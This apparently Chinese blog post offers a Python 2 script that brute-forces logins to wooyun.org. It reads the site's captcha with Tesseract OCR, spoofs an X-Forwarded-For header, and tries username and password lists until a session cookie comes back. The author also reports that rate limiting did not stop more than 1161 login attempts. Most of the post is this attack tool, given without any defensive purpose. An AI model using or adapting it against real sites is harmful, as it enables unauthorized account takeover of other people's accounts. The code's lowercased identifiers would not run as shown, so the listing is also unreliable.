- A+
所属分类:Python
需要预安装如下程序
1、pytesseract (可以pip install pytesseract安装)
2、python imaging library (pil)
3、tesseract-ocr
原理:
1、利用tesseract 进行验证码的识别。
2、post暴力猜解
问题1.验证码的识别率
进行了一次处理,从正则里可以看到pattern = '^[a-za-z0-9]{4}$' 只取识别为4位的字符,如果不是则重新请求验证码,这个在很大程度上提高了识别率。
问题2.服务端频率验证
经过我两天的实验观察,早上会有次数限制,连续两天的下午我尝试了大于1161次的登陆都没有限制,不知道是什么原因,也许是我网络问题
#coding: utf-8
#date: 2014/09/23
#author: titans
import cookielib
import urllib2
import urllib
import socket
import sys
import time
import re
import image
import pytesseract
def guess_login(url, users, passwords):
cj = cookielib.cookiejar()
opener = urllib2.build_opener(urllib2.httpcookieprocessor(cj))
opener.addheaders = [
('user-agent','mozilla/5.0 (windows nt 5.1; rv:24.0) gecko/20100101 firefox/24.0'),
('accept','text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'),
('accept-encoding','gzip, deflate'),
('connection', 'keep-alive'),
('x-forwarded-for','127.0.0.1'),
]
urllib2.install_opener(opener)
captcha = ''
catp_url = 'http://www.wooyun.org/captcha.php'
pattern = '^[a-za-z0-9]{4}$'
regex = re.compile(pattern)
for user in users:
user = user.strip()
find = false
for password in passwords:
while_mark = 1
password = password.strip()
while(while_mark):
opener.open(url)
pic = opener.open(catp_url)
content = pic.read()
f = open('c:\\temp\capta.jpg','wb')
f.write(content)
f.close()
time.sleep(1)
captcha = pytesseract.image_to_string(image.open('c:\\temp\capta.jpg'))
re_result = regex.match(captcha)
if re_result:
print user, password, captcha
post_data = 'email=%s&password=%s&captcha=%s'%(user,password,captcha)
post_url = 'http://www.wooyun.org/user.php?action=login&do=login'
resp = opener.open(post_url,post_data)
while_mark = 0
cookies = resp.info().getheaders('set-cookie')
if len(cookies):
find = true
raw_input('get it!!%s %s'%(user,password))
else:
print '[*]repeat request'
pass
if find == true:
break
def run():
if len(sys.argv) !=3:
usage()
url = 'http://www.wooyun.org/user.php?action=login'
users = open(sys.argv[1],'r').readlines()
passwords = open(sys.argv[2],'r').readlines()
guess_login(url, users, passwords)
def usage():
print 'wooyun.py users.txt passwords.txt'
exit(0)
if __name__ == '__main__':
run()
windows下使用,如果linux下测试,修改存放验证码的路径c:\\temp\capta.jpg 改为linux下的路径即可
usage: wooyun.py users.txt passwords.txt
- 我的微信
- 这是我的微信扫一扫
-
- 我的微信公众号
- 我的微信公众号扫一扫
-




